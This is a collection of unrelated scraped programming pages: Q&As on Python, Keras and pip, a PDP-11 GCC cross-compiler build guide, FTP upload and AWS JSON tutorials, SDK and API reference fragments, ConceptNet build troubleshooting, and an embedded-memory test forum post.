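Another .c file is free to define its own call_count or log_call without any linker conflict, and it has no way to read or modify the ones defined here.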
In a previous article, 《STM32 "hidden timer" - DWT》, the code for measuring the running time of a piece of code was as follows:

float DTW_Time_Difference_ms(void)
{
    static uint32_t old_counter;
    uint32_t counter, couter_current;

    couter_current = DWT_TS_GET();
    if(couter_current > old_counter)
        counter = couter_current - old_counter;
    else
        counter = couter_current + 0XFFFFFFFF - old_counter;

    old_counter = couter_current;
    return (counter / (SystemCoreClock/1000));
}

Using the static keyword there, I also realized one of its benefits: it is good for function encapsulation. When you want to encapsulate a function so completely that it can be reused just by copying it into another project, you would otherwise need a global variable; a static local variable inside the function does the job instead.

Everyone who reads the article: if you have a wonderful use of the static keyword, please leave a message in the comment area!

Click to view the album of this article: Advanced C language
https://developpaper.com/detailed-explanation-of-static-keyword-in-c-language/
CC-MAIN-2022-40
en
refinedweb
Each Answer to this Q is separated by one/two green lines.

I am interested in building reinforcement learning models with the simplicity of the Keras API. Unfortunately, I am unable to extract the gradient of the output (not error) with respect to the weights. I found the following code that performs a similar function (Saliency maps of neural networks (using Keras)):

get_output = theano.function([model.layers[0].input], model.layers[-1].output, allow_input_downcast=True)
fx = theano.function([model.layers[0].input], T.jacobian(model.layers[-1].output.flatten(), model.layers[0].input), allow_input_downcast=True)
grad = fx([trainingData])

Any ideas on how to calculate the gradient of the model output with respect to the weights for each layer would be appreciated.

To get the gradients of model output with respect to weights using Keras you have to use the Keras backend module. I created this simple example to illustrate exactly what to do:

import numpy as np
import tensorflow as tf
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras import backend as k

model = Sequential()
model.add(Dense(12, input_dim=8, init="uniform", activation='relu'))
model.add(Dense(8, init="uniform", activation='relu'))
model.add(Dense(1, init="uniform", activation='sigmoid'))
model.compile(loss="binary_crossentropy", optimizer="adam", metrics=['accuracy'])

To calculate the gradients we first need to find the output tensor. For the output of the model (what my initial question asked) we simply call model.output. We can also find the gradients of outputs for other layers by calling model.layers[index].output:

outputTensor = model.output  # Or model.layers[index].output

Then we need to choose the variables that are in respect to the gradient:

listOfVariableTensors = model.trainable_weights
# or variableTensors = model.trainable_weights[0]

We can now calculate the gradients. It is as easy as the following:

gradients = k.gradients(outputTensor, listOfVariableTensors)

To actually run the gradients given an input, we need to use a bit of Tensorflow:

trainingExample = np.random.random((1,8))
sess = tf.InteractiveSession()
sess.run(tf.initialize_all_variables())
evaluated_gradients = sess.run(gradients, feed_dict={model.input:trainingExample})

And that's it!

The below answer uses the cross entropy loss function; feel free to change it to your own function:

outputTensor = model.output
listOfVariableTensors = model.trainable_weights
bce = keras.losses.BinaryCrossentropy()
loss = bce(outputTensor, labels)  # labels is assumed to be defined elsewhere
gradients = k.gradients(loss, listOfVariableTensors)
sess = tf.InteractiveSession()
sess.run(tf.global_variables_initializer())
evaluated_gradients = sess.run(gradients, feed_dict={model.input:training_data1})
print(evaluated_gradients)
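As a side note that is not part of the original answers: in TensorFlow 2.x the same gradients are usually computed eagerly with tf.GradientTape instead of K.gradients and sessions. A rough sketch, assuming a tf.keras model built like the one above:

import numpy as np
import tensorflow as tf

x = tf.convert_to_tensor(np.random.random((1, 8)), dtype=tf.float32)
with tf.GradientTape() as tape:
    output = model(x)                                       # forward pass recorded on the tape
grads = tape.gradient(output, model.trainable_weights)      # d(output)/d(each weight tensor)

Each element of grads lines up with the corresponding tensor in model.trainable_weights.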
https://techstalking.com/programming/python/getting-gradient-of-model-output-w-r-t-weights-using-keras/
CC-MAIN-2022-40
en
refinedweb
Each Answer to this Q is separated by one/two green lines.

I was playing around with iterables and more specifically the yield operator in Python. While using test driven development to start writing a new iterable, I wondered what is the shortest code that could make this simple test for an iterable pass:

def test():
    for x in my_iterable():
        pass

The shortest version I could think of was:

def my_iterable():
    for i in []:
        yield i

Is it possible to write a simpler, shorter or more beautiful (pythonic) version?

Yes, there is:

return iter([])

Another solution, in Python 3, is to use the new yield from syntax:

def empty_gen():
    yield from ()

which is readable and keeps empty_gen as a generator.

You can use the lambda and iter functions to create an empty iterable in Python:

my_iterable = lambda: iter(())

How about my_iterable = str? This passes your test.

To speak seriously, Iterable in the collections module provides:

def __iter__(self):
    while False:
        yield None

This can be considered "most pythonic" because this is what python itself uses. Note that technically all answers so far provide iterators (__iter__ + next), not iterables (just __iter__).

def do_yield():
    return
    yield None

Use this if usage of yield is important for you; otherwise, use one of the other answers.

Another answer, as I provide a completely new solution with a different approach. In one of my libraries, I have an EmptyIterator such as:

class EmptyIter(object):
    __name__ = 'EmptyIter'
    """Iterable which is False and empty"""
    def __len__(self):
        return 0
    def next(self):
        raise StopIteration  # even that is redundant
    def __getitem__(self, index):
        raise IndexError

It is an alternative approach which uses the following properties: __len__() returning 0 makes the object empty and falsy, and __getitem__() raising IndexError ends iteration under the old sequence-iteration protocol.
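For completeness (this check is an addition, not part of the answers above), each of the variants can be run against the original test:

def check(my_iterable):
    for x in my_iterable():
        pass              # the loop body never runs for an empty iterable

check(lambda: iter([]))
check(lambda: iter(()))
check(do_yield)
check(empty_gen)          # Python 3 only

All of them simply produce zero items, so the for loop completes without ever executing its body.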
https://techstalking.com/programming/python/what-is-the-simplest-way-to-create-an-empty-iterable-using-yield-in-python/
CC-MAIN-2022-40
en
refinedweb
I have a new MacBook – a user installed it, and then I installed a new user (mine), granted admin privileges and deleted the old one. I am on macOS Catalina. Since the installation I've been having several permission problems. VSCode can't find Jupyter Notebook, and pip installs packages at ~/Library/Python/3.7/site-packages. When I do which python3 I get usr/bin/python3. When I do pip3 install <package> I get:

Defaulting to user installation because normal site-packages is not writeable

And then it says it has already been installed, even though I can't access it when I do import <package>. It seems clear that this is a permission problem: pip can't install to the "base" Python, and then Python can't find what I've installed into ~/Library/Python/3.7/site-packages. I've tried reinstalling the OS, but since I haven't done a clean install, it didn't change anything. What am I missing? How exactly can I fix permissions? Where do I want packages to be installed (venv, sure, but some packages I want global, like jupyter)? Thanks

Solution #1: As @TomdeGeus mentioned in the comments, this command works for me:

python3 -m pip install [package_name]

Solution #2: It's best to not use the system-provided Python directly. Leave that one alone since the OS can change it in undesired ways, as you experienced. The best practice is to configure your own Python version(s) and manage them on a per-project basis using virtualenv (for Python 2) or venv (for Python 3). This eliminates all dependency on the system-provided Python version, and also isolates each project from other projects on the machine. Each project can have a different Python point version if needed, and gets its own site_packages directory so pip-installed libraries can also have different versions by project. This approach is a major problem-avoider.

Solution #3: python3.7 -m pip install [package_name] solved it for me. The most voted answer, python3 -m pip install [package_name], does not help me here. In my case, this was caused by a conflict with the dominating 3.6 version that was also installed. Here is a demonstration using --upgrade pip:

pip3 install --upgrade pip
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: pip in /home/USERNAME/.local/lib/python3.6/site-packages (20.3.1)

python3 -m pip install --upgrade pip
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: pip in /home/USERNAME/.local/lib/python3.6/site-packages (20.3.1)

python3.7 -m pip install --upgrade pip
Collecting pip
Cache entry deserialization failed, entry ignored
Using cached
Installing collected packages: pip
Successfully installed pip-20.3.1

Solution #4: I had the same issue on a Jetson Nano. Using sudo worked, so try sudo with pip.

Solution #5: This occurred for me when the virtual environment folder was named venv. In this case, it gives errors like "No module pip" and "Default folder is unwritable". Renaming the folder solved the problem.

Solution #6: Had this same issue on a fresh install of Debian 9.12. Rebooting my server solved the issue.

Solution #7: In my case python3 -m pip install [package_name] did not solve it. It was a problem related to other processes occupying the directory. I restarted PyCharm, closed any other program that might occupy the folder, and reinstalled the package into the site-packages directory successfully.
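As an illustration of the per-project approach recommended in Solution #2 (the environment name here is made up), a minimal venv workflow looks like this:

python3 -m venv ~/venvs/myproject          # create an isolated environment
source ~/venvs/myproject/bin/activate      # activate it (bash/zsh)
pip install jupyter                        # installs into the venv, no sudo needed
deactivate                                 # leave the environment

While the environment is active, pip and python refer to the venv's own copies, so the "normal site-packages is not writeable" message never applies.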
https://techstalking.com/programming/question/solved-pip-python-normal-site-packages-is-not-writeable/
CC-MAIN-2022-40
en
refinedweb
Overview TODO: Write introduction. Goal is to build a cross compiler targeting pdp11-aout. TODO: What kind of joint header do I want across all the articles in a set, linking them together? This document guides you through building a cross compiler using GCC on FreeBSD. This cross compiler will run on a modern AMD64 machine but emit code which runs on a DEC PDP-11. In addition to the compiler, these instructions also build associated tooling like an assembler, linker, etc. In this manner, modern programming tools like make, git, vi, and more can be used to write modern C in your usual style while targeting the PDP-11. Installation These instructions were tested on FreeBSD 12 with GCC 7.3.0 from ports as the host compiler. The cross compiler was built from the GCC 10.2.0 and Binutils 2.35.1 source code. Building GCC requires GNU Make. On FreeBSD either install via pkg install gmake or build from ports under devel/gmake. On Linux your make command is probably gmake in disguise. Run make --version and see if the first line is something like GNU Make 4.2.1. In addition to GCC, we will also need to compile GNU Binutils since it contains the assembler, linker, and other necessary tools. Obtain suitable source code tarballs from these links. I like to build all my cross compilers under one folder in my home directory, each with a version specific sub-folder. setenv PREFIX "$HOME/cross-compiler/pdp11-gcc10.2.0" Remember to make any $PATH changes permanent. For tcsh on FreeBSD, this means editing ~/.cshrc. To set the $PATH for this session, execute the following. setenv PATH "$PREFIX/bin:$PATH" The $TARGET environment variable is critical as it tells GCC what kind of cross compiler we desire. In our case, this target triplet is requesting code for the PDP-11 architecture, wrapped in an a.out container, with no hosted environment. That means this is a bare-metal target. There will be no C standard library, only the C language itself. setenv TARGET pdp11-aout Both GCC and binutils are best built from outside the source tree. Make two directories to hold the build detritus. Use a clean build directory each time you reconfigure or rebuild. cd $HOME/cross-compiler/pdp11-gcc10.2.0 mkdir workdir-binutils mkdir workdir-gcc Build binutils first. Assuming you saved the source code in ~/cross-compiler/pdp11-gcc10.2.0/, simply do the following. cd $HOME/cross-compiler/pdp11-gcc10.2.0 tar xzf binutils-2.35.1.tar.gz cd workdir-binutils Now configure, build and install binutils. ../binutils-2.35.1/configure --target=$TARGET --prefix="$PREFIX" \ --with-sysroot --disable-nls --disable-werror gmake gmake install Verify that you can access a series of files in your $PATH named pdp11-aout-* (e.g. pdp11-aout-as), and that checking their version with pdp11-aout-as --version results in something like GNU Binutils 2.35.1. With binutils built and installed, now it’s time to build GCC. Follow a similar process to unpack the source code, but note the new requirement to download dependencies. In older versions of GCC this command was ./contrib/download-dependencies instead of ./contrib/download-prerequisites. cd $HOME/cross-compiler/pdp11-gcc10.2.0 tar xzf gcc-10.2.0.tar.gz cd gcc-10.2.0 ./contrib/download-prerequisites cd ../workdir-gcc Configuring GCC proceeds similarly to binutils. Both GNU as and GNU ld are part of binutils, hence the directive informing GCC to use them. 
../gcc-10.2.0/configure --target=$TARGET --prefix="$PREFIX" \
    --disable-nls --enable-languages=c --without-headers \
    --with-gnu-as --with-gnu-ld --disable-libssp
gmake all-gcc
gmake install-gcc

Verify that pdp11-aout-gcc --version from your $PATH reports something like pdp11-aout-gcc 10.2.0. That's it, you're done. You now have a cross compiler that will run on your workstation and output PDP-11 compatible binaries in a.out format. At this point you can skip ahead to the next section or continue reading about some potential pitfalls of the cross compiler we've just built.

Potential Pitfalls

Below are a few problems I ran into while using my cross compiler, some of which may apply when compiling your own code for the PDP-11. I hope that by mentioning the problems here, along with symptoms and workarounds, you might be saved some time when encountering them.

Compiling libgcc

Our newly built cross compiler expects libgcc to exist at link time, but we didn't build it. So what is libgcc anyway? The GCC manual describes it as GCC's low-level runtime library: GCC emits calls into it whenever it needs an operation that is too complicated to generate inline code for. Why didn't we build libgcc? Because the build failed with an error when we tried.

Problem

Consider the following C code, which performs division and modulus operations on 16-bit unsigned integers:

#include "pdp11.h"
#include <stdint.h>

uint16_t a=8, b=64;

printf("b %% a = %o\n", b % a);
printf("b / a = %o\n", b / a);

If we try to compile this code, we receive two errors from the linker:

pdp11-aout-ld: example.o:example.o:(.text+0x8e): undefined reference to `__umodhi3'
pdp11-aout-ld: example.o:example.o:(.text+0xac): undefined reference to `__udivhi3'

The two functions referenced, __umodhi3 and __udivhi3, are part of libgcc. The names reference the unsigned modulo or division on half-integer types. Per the GCC manual, the half-integer mode uses a two-byte integer.

Solution

There are two ways around this problem. The first (and superior) option is figuring out how to build libgcc. The command to initiate the build is gmake all-target-libgcc, executed under the same environment in which gmake all-gcc was executed earlier in this guide. If you figure out what I'm doing wrong, let me know.

The second option is to implement your own functions for __umodhi3(), __udivhi3(), and whatever else might come up. It's not hard to make something functional, though catching all the edge cases could be challenging.

Using uint32

Although the PDP-11 utilizes a 16-bit word, GCC is clever enough to allow operations on 32-bit words by breaking them up into smaller operations. For example, in the following assembly code generated by GCC, note how the 32-bit word is pushed onto the stack as two separate words, while the 16-bit word needs only one:

uint32_t a=0710004010;
    add $-4, sp
    mov $3440, (sp)
    mov $4010, 2(sp)

uint16_t a=010;
    add $-2, sp
    mov $10, (sp)

Problem

Whenever I try to make real use of code with uint32_t, I encounter internal compiler errors like the following:

memtest.c:119:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 95 44 45 (set (reg:HI 1 r1)
        (reg/f:HI 16 virtual-incoming-args)) "memtest.c":114 14 {movhi}
     (nil))
memtest.c:119:1: internal compiler error: in extract_constrain_insn_cached, at recog.c:2225
no stack trace because unwind library not available
Please submit a full bug report, with preprocessed source if appropriate.
See <> for instructions.
*** Error code 1

In each case, adding a single uint32_t operation in one spot in the code resulted in a compiler error in a completely different part of the code. Removing the offending uint32_t line caused the program to again compile and execute normally. In each case, I already had uint32_t related code working elsewhere in the program.

Solution

Until I track down the bug causing these errors, I've been using structs containing pairs of uint16_t words and writing helper functions to perform operations on them (a rough sketch of this approach appears at the end of this article).

GNU Assembler Bug

If you're stuck using an older version of GNU binutils, as I was while cross compiling from a SPARCstation 20, there is a bug in the GNU assembler that crops up whenever double indirection is used in code compiled by GCC. It was present until at least GNU Binutils 2.28 but appears to be fixed no later than 2.32, per the following code snippet in binutils-2.32/gas/config/tc-pdp11.c:

if (*str == '@' || *str == '*')
  {
    /* @(Rn) == @0(Rn): Mode 7, Indexed deferred.
       Check for auto-increment deferred.  */
    if ( ...
In each case, I already had uint32_t related code working elsewhere in the program. Solution Until I track down the bug causing these errors, I’ve been using structs containing pairs of uint16_t words and writing helper functions to perform operations on them. GNU Assembler Bug If you’re stuck using an older version of GNU binutils, as I was while cross compiling from a SPARCstation 20, there is a bug in the GNU assembler that crops up whenever double-indirection is used in GCC. It was present until at least GNU Binutil 2.28 but appears to be fixed no later than 2.32 per the following code snippet in binutils-2.32/gas/config/tc-pdp11.c. if (*str == '@' || *str == '*') { /* @(Rn) == @0(Rn): Mode 7, Indexed deferred. Check for auto-increment deferred. */ if ( ... Problem compiles this to assembly it generates code of the form @(Rn) when assigning a value to **csp thus causing the value 0 to overwrite the value 060000 at *csp if GNU as is used to assemble the code. Solution The following patch, tested on GNU binutils 2.28, fixes the bug. It’s a little hacky since it overloads the operand->code variable to pass unrelated state information to parse_reg(). ---;
https://www.subgeniuskitty.com/development/pdp-11/modern_c_software_development/pdp11-cross-compiler
CC-MAIN-2022-40
en
refinedweb
Quantum Computing Service

The platform enabling researchers to access beyond-classical computational resources.

Our quantum computing service provides chaperoned access to NISQ processors and our simulator for researchers who aim to advance the state-of-the-art in quantum computing and publicly share their results in algorithms, applications, tools, and processor characterizations.

import cirq
import sympy

sampler = cirq.google.get_engine_sampler(
    project_id=PROJECT_ID, processor_id=PROCESSOR_ID, gate_set_name='sqrt_iswap')

circuit = cirq.Circuit(
    cirq.XPowGate(exponent=sympy.Symbol('t'))(cirq.GridQubit(5,4)),
    cirq.measure(cirq.GridQubit(5,4), key='meas'))

rabi_sweep = cirq.Linspace('t', start=0, stop=1, length=20)
results = sampler.run_sweep(circuit, repetitions=1000, params=rabi_sweep)

for t in range(20):
    print(results[t].histogram(key='meas'))

Early Access

Partners access Sycamore via our Quantum Engine API, and user feedback will improve the service. We are currently collaborating with a group of early access partners and will welcome new applications in 2021.
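As a side note on the code sample above (an addition, not from the original page): each entry returned by run_sweep is a result object whose histogram() method returns a counter of measured values, so the Rabi oscillation can be summarized roughly like this:

for t, result in enumerate(results):
    counts = result.histogram(key='meas')   # e.g. Counter({0: 512, 1: 488})
    p1 = counts[1] / 1000                   # fraction of |1> outcomes at this sweep point
    print(t, p1)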
https://quantumai.google/quantum-computing-service?hl=nl
CC-MAIN-2022-40
en
refinedweb
Python – Uploading Data

We can upload data to a server using Python's module for handling FTP, or File Transfer Protocol: ftplib. Since ftplib is part of the Python standard library, there is nothing extra to install.

Using ftplib

In the below example we use the FTP class to connect to the server and then supply the user credentials. Next we open the file to upload and use the storbinary method to send and store it on the server.

import ftplib

ftp = ftplib.FTP("127.0.0.1")
ftp.login("username", "password")

file = open('index.html', 'rb')
ftp.storbinary("STOR index.html", file)
file.close()

When we run the above program, we observe that a copy of the file has been created on the server.

Using ftpretty

Similar to ftplib, we can use the third-party ftpretty module to connect securely to a remote server and upload a file. We can also download a file using ftpretty. The below program illustrates the same.

from ftpretty import ftpretty

# Mention the host
host = "127.0.0.1"

# Supply the credentials
f = ftpretty(host, "username", "password")

# Get a file, save it locally
f.get('someremote/file/on/server.txt', '/tmp/localcopy/server.txt')

# Put a local file to a remote location
# non-existent subdirectories will be created automatically
f.put('/tmp/localcopy/data.txt', 'someremote/file/on/server.txt')

When we run the above program, we observe that a copy of the file has been created on the server.
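As a small addition that is not part of the original tutorial: ftplib's FTP object can also be used as a context manager, which closes the connection automatically when the block ends:

import ftplib

with ftplib.FTP("127.0.0.1") as ftp:                 # connection is closed on exit
    ftp.login("username", "password")
    with open("index.html", "rb") as file:
        ftp.storbinary("STOR index.html", file)      # upload under the same name

This avoids leaking the connection if the upload raises an exception partway through.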
https://scanftree.com/tutorial/python/python-network-programming/python-uploading-data/
CC-MAIN-2022-40
en
refinedweb
#include <QoS_Decorator.h> #include <QoS_Decorator.h> Inheritance diagram for ACE_QoS_Decorator: Decorates the ACE_Event_Handler to additionally handle QoS events uniformly for different QoS mechanisms like RAPI and GQoS. Constructor. ACE_Reactor::instance() Destructor. [virtual] Calls the base class get_handle (). Reimplemented from ACE_QoS_Decorator_Base. Calls the base class handle_input (). Calls the base class handle_qos (). This method registers the QoS Event Handler with the Reactor to receive RAPI events. [private] Requests on the class are forwarded to this base class;. Handles the QoS events and in that sense decorates the usual ACE_Event_Handler. Passed to the ACE_QoS_Event_Handler for retrieving the RAPI session specific information like rapi_fd. If the application wants to use an instance of Reactor other than the Singleton one. Reimplemented from ACE_Event_Handler.
https://www.dre.vanderbilt.edu/Doxygen/5.5/html/ace/QoS/classACE__QoS__Decorator.html
CC-MAIN-2022-40
en
refinedweb
@Generated(value="OracleSDKGenerator", comments="API Version: 20200131") public class ListSightingsRequest extends BmcRequest<Void> getBody$, getInvocationCallback, getRetryConfiguration, setInvocationCallback, setRetryConfiguration, supportsExpect100Continue clone, finalize, getClass, notify, notifyAll, wait, wait, wait public ListSightingsRequest() public String getCompartmentId() The ID of the compartment in which to list resources. public String getProblemId() OCID of the problem. public String getResourceProfileId() OCID of the resource profile. public Boolean getCompartmentIdInSubtree() Default is false. When set to true, the hierarchy of compartments is traversed and all compartments and subcompartments in the tenancy are returned depending on the the setting of accessLevel. public ListSight ListSightingsRequest.SortBy getSortBy() The field to sort by. Only one sort order may be provided. Default order for timeCreated is descending. If no value is specified timeCreated is String getOpcRequestId() The client request ID for tracing. public ListSightingsRequest.Builder toBuilder() Return an instance of ListSightingsRequest.Builder that allows you to modify request properties. ListSightingsRequest.Builderthat allows you to modify request properties. public static ListSight>
https://docs.oracle.com/en-us/iaas/tools/java/2.44.0/com/oracle/bmc/cloudguard/requests/ListSightingsRequest.html
CC-MAIN-2022-40
en
refinedweb
JSON

JSON is a format for data exchange that is both human-readable and machine-readable. Although the name JSON is an acronym for JavaScript Object Notation, the format of JSON is independent of any programming language. The Amazon SDK for JavaScript uses JSON to send data to service objects when making requests and receives data from service objects as JSON. For more information about JSON, see json.org.

JSON represents data in two ways:

As an object, which is an unordered collection of name-value pairs. An object is defined within left ({) and right (}) braces. Each name-value pair begins with the name, followed by a colon, followed by the value. Name-value pairs are comma separated.

As an array, which is an ordered collection of values. An array is defined within left ([) and right (]) brackets. Items in the array are comma separated.

Here is an example of a JSON array of objects in which the objects represent cards in a card game. Each card is defined by two name-value pairs, one that specifies a unique value to identify that card and another that specifies a URL that points to the corresponding card image.

var cards = [
  {"CardID":"defaultname", "Image":"defaulturl"},
  {"CardID":"defaultname", "Image":"defaulturl"},
  {"CardID":"defaultname", "Image":"defaulturl"},
  {"CardID":"defaultname", "Image":"defaulturl"},
  {"CardID":"defaultname", "Image":"defaulturl"}
];

JSON as service object parameters

Here is an example of simple JSON used to define the parameters of a call to an Amazon Lambda service object:

const params = {
  FunctionName : "slotPull",
  InvocationType : "RequestResponse",
  LogType : "None"
};

The params object is defined by three name-value pairs, separated by commas within the left and right braces. When providing parameters to a service object method call, the names are determined by the parameter names for the service object method you plan to call. When invoking a Lambda function, FunctionName, InvocationType, and LogType are the parameters used to call the invoke method on a Lambda service object. When passing parameters to a service object method call, provide the JSON object to the method call, as shown in the following example of invoking a Lambda function.

import { LambdaClient, InvokeCommand } from "@aws-sdk/client-lambda";

(async function() {
  const lambdaClient = new LambdaClient({ region: "us-west-2" });

  // create JSON object for service call parameters
  const params = {
    FunctionName : "slotPull",
    InvocationType : "RequestResponse",
    LogType : "None"
  };

  // create InvokeCommand command
  const command = new InvokeCommand(params);

  // invoke Lambda function
  try {
    const response = await lambdaClient.send(command);
    console.log(response);
  } catch (err) {
    console.error(err);
  }
})();
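One detail the invoke example glosses over (this note and snippet are an addition, not from the guide): in version 3 of the SDK the response's Payload field arrives as a byte array, so to get at the JSON your Lambda function returned you typically decode and parse it:

const response = await lambdaClient.send(command);
// Payload is a Uint8Array in SDK for JavaScript v3; decode it, then parse the JSON text
const result = JSON.parse(new TextDecoder("utf-8").decode(response.Payload));
console.log(result);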
https://docs.amazonaws.cn/en_us/sdk-for-javascript/v3/developer-guide/working-with-json.html
CC-MAIN-2022-40
en
refinedweb
Is this a known issue? Hi, a newbie here. I tried to run "snakemake data/vectors/mini.h5" and received this error:

File "/home/bancherd/.local/lib/python3.8/site-packages/wordfreq/tokens.py", line 264, in tokenize
  tokens = _mecab_tokenize(text, language.language)
File "/home/bancherd/.local/lib/python3.8/site-packages/wordfreq/mecab.py", line 40, in mecab_tokenize
  MECAB_ANALYZERS[lang] = make_mecab_analyzer(lang)
File "/home/bancherd/.local/lib/python3.8/site-packages/wordfreq/mecab.py", line 20, in make_mecab_analyzer
  import ipadic
ModuleNotFoundError: No module named 'ipadic'
[Sun Aug 22 17:01:09 2021] Error in rule miniaturize: jobid: 0 output: data/vectors/mini.h5 shell: cn5-vectors miniaturize data/vectors/numberbatch-biased.h5 data/vectors/w2v-google-news.h5 data/vectors/mini.h5 (exited with non-zero exit code)

I tried to look for "ipadic", without success. Can anyone suggest solutions? Thank you!

In spite of the warning on PyPI, I went ahead, installed "ipadic" and re-ran the script. I got the following (different) error:

Building prefix dict from /home/bancherd/.local/lib/python3.8/site-packages/wordfreq/data/jieba_zh.txt ...
Dumping model to file cache /tmp/jieba.u600b79f75cbc9b33aa477293be70c0e2.cache
Prefix dict has been built successfully.
/usr/bin/bash: line 1: 37532 Killed cn5-vectors miniaturize data/vectors/numberbatch-biased.h5 data/vectors/w2v-google-news.h5 data/vectors/mini.h5
[Sun Aug 22 20:16:41 2021] Error in rule miniaturize: jobid: 0 output: data/vectors/mini.h5 shell:

Hi all, I'm also building ConceptNet5 for the first time on a machine running Ubuntu 20.04 with 32 GB of RAM. I was able to run ./build.sh without any obvious errors that I saw in the output, but pytest is returning failed and skipped tests. Specifically: test_languages.py fails (316); the error message indicates it is unable to find the language_data module (traced to line 809 in .../langcodes/__init__.py). test_json_ld.py fails as well, with a KeyError on line 82 (which is: "quiz = ld[api('/c/en/quiz')]") and on line 161 ("rel = ld[vocab('rel')]"). Do these errors indicate that the installation was not successful and I should re-install? Or have others encountered the same issues and found solutions? I did check the documentation and Googled the errors, but did not find any relevant troubleshooting solutions. Any suggestions would be appreciated.

Hi, I want to build a ConceptNet node, but when I run build.sh I get this error:

Error in rule convert_opensubtitles_ft: jobid: 0 output: data/vectors/fasttext-opensubtitles.h5
RuleException: CalledProcessError in line 663 of /home/zb/Desktop/conceptnet/Snakefile: Command 'set -euo pipefail; CONCEPTNET_DATA=data cn5-vectors convert_fasttext -n 2000000 data/raw/vectors/ft-opensubtitles.vec.gz data/vectors/fasttext-opensubtitles.h5' returned non-zero exit status 137.
File "/home/zb/Desktop/conceptnet/Snakefile", line 663, in __rule_convert_opensubtitles_ft
File "/usr/lib/python3.8/concurrent/futures/thread.py", line 57, in run
Exiting because a job execution failed. Look above for error message
[Sat Sep 11 19:11:39 2021] Finished job 206. 371 of 472 steps (79%) done
Shutting down, this might take some time.
Exiting because a job execution failed. Look above for error message
Complete log: /home/zb/Desktop/conceptnet/.snakemake/log/2021-09-11T182112.270477.snakemake.log

What could be the reason for this? How can I proceed with the installation instead of starting over? I have:
300 GB of free disk space, at least 30 GB of available RAM, and the time and bandwidth to download 24 GB of raw data.

I started build.sh and at 464 of 472 steps (98%) done I get an error:

/usr/bin/bash: line 1: 22394 Killed
[Mon Sep 13 03:26:07 2021] Error in rule merge_intersect: jobid: 177 output: data/vectors/numberbatch-retrofitted.h5, data/vectors/intersection-projection.h5 shell: (exited with non-zero exit code)
Removing temporary output file data/psql/edges_gin.csv.
[Mon Sep 13 03:27:40 2021] Finished job 3. 464 of 472 steps (98%) done
Shutting down, this might take some time.
Exiting because a job execution failed. Look above for error message
Complete log: /home/zb/Desktop/conceptnet5/.snakemake/log/2021-09-12T221420.189372.snakemake.log

Hi
https://gitter.im/commonsense/conceptnet5?at=61952a29f4ced9438ed1d918
CC-MAIN-2022-40
en
refinedweb
Make service clients not truncate responses and move them to tempest-lib

Service clients are Tempest's own REST clients for operating each OpenStack project's APIs, and there is a plan to migrate the service clients' methods to tempest-lib.

1. Currently these methods cut the top key out of the response, like:

def show_host_detail(self, hostname):
    """Show detail information for the host."""
    resp, body = self.get("os-hosts/%s" % str(hostname))
    body = json.loads(body)
    self.validate_response(schema.show_host_detail, resp, body)
    return service_client.ResponseBodyList(resp, body['host'])

However, this truncation is wrong for a library function, because the caller cannot see the complete response returned from the corresponding API. One example is resource links, which are currently truncated by the service clients; if a caller needs to use those resource links, it cannot get them from the current service clients.

2. Currently the JSON schemas which are used to validate responses in service clients live in Tempest. When the service clients are migrated to tempest-lib, those schemas must be accessible to the service clients in tempest-lib.

def show_host_detail(self, hostname):
    """Show detail information for the host."""
    resp, body = self.get("os-hosts/%s" % str(hostname))
    body = json.loads(body)
    self.validate_response(schema.show_host_detail, resp, body)
-   return service_client.ResponseBodyList(resp, body['host'])
+   return service_client.ResponseBodyList(resp, body)

Move JSON response schemas to tempest-lib: currently Tempest has JSON response schemas in 'tempest/api_schema' which are used in service clients to validate API responses. During the Vancouver summit, it was decided that as a short-term solution we can move those schemas into tempest-lib along with the service clients. In the long term, each project should provide some way to get those schemas, through an API or something else.

Copy the service client code to the tempest-lib repository.
Switch Tempest to use the service client code of tempest-lib.
Migration of service clients can be done gradually, one client class at a time.

Primary assignee: Other contributors:

Except where otherwise noted, this document is licensed under Creative Commons Attribution 3.0 License. See all OpenStack Legal Documents.
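As a rough illustration of what the change means for a caller (a hypothetical usage sketch, not code from Tempest itself; the client attribute, host name and field names are made up), the test now unwraps the top-level key on its own and keeps access to everything else in the decoded response:

# Hypothetical caller-side code after the change described above.
body = self.hosts_client.show_host_detail("compute-1")

host_info = body['host']          # the data the old client used to return
links = body.get('links', [])     # e.g. resource links, previously unreachable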
http://specs.openstack.org/openstack/qa-specs/specs/tempest/implemented/method-return-value-and-move-service-clients-to-lib.html
CC-MAIN-2018-43
en
refinedweb
Dear friends of the Freescale Forum, Although I am grateful for the intelligent tools that Freescale has developed for compiling very efficient code, sometimes I am frustrated when the intelligence prevents me from executing redundant tasks like testing my static RAM array attached to the mini-flex bus. During the development stage I discovered that when compiling under global optimization of 4, the intelligence would prevent me from taking a value, writing it to memory and reading it back again. It would ignore the code altogether because I guess it felt it was redundant. To circumvent the intelligence I wrote the following code:

uint_16 test_memory(void){
    mem_slct[0] = (uint_8 *)0x100ffff0 ;
    mem_slct[1] = (uint_8 *)0x101ffff2 ;
    mem_slct[2] = (uint_8 *)0x102ffff4 ;
    mem_slct[3] = (uint_8 *)0x103ffff6 ;
    mem_slct[4] = (uint_8 *)0x104ffff7 ;
    mem_slct[5] = (uint_8 *)0x105ffffa ;
    mem_slct[6] = (uint_8 *)0x100ffffc ;
    mem_slct[7] = (uint_8 *)0x107ffffe ;
    for(num_chips = 0;num_chips < 8; num_chips ++ )
    {
        mem_pointer = mem_slct[num_chips];
        select_ram_page(mem_pointer);
        old_memory[num_chips] = *mem_pointer;
        mem_pointer++;
        test_data = *mem_pointer;
        mem_pointer --;
        *mem_pointer =0x55;
        test_data = *mem_pointer;
        *mem_pointer = old_memory[num_chips];
        if( test_data != 0x55 ) break;
    }
    select_ram_page(0);
    return (num_chips);
}

I used global variables so that I could view the results in the IDE. I had to actually use the mem_pointer so that it wouldn't be optimized out of use. During our first production run of a 52259-based product we ran into defects where address and data lines were disconnected. Sometimes a defect of this nature can go undetected if the memory location affected isn't reached. I now need to come up with a full memory test (not just a few locations) that will be able to indicate when a defect is discovered. I will post my code when finished but I am open to suggestions. Thanks

Maybe this will help:
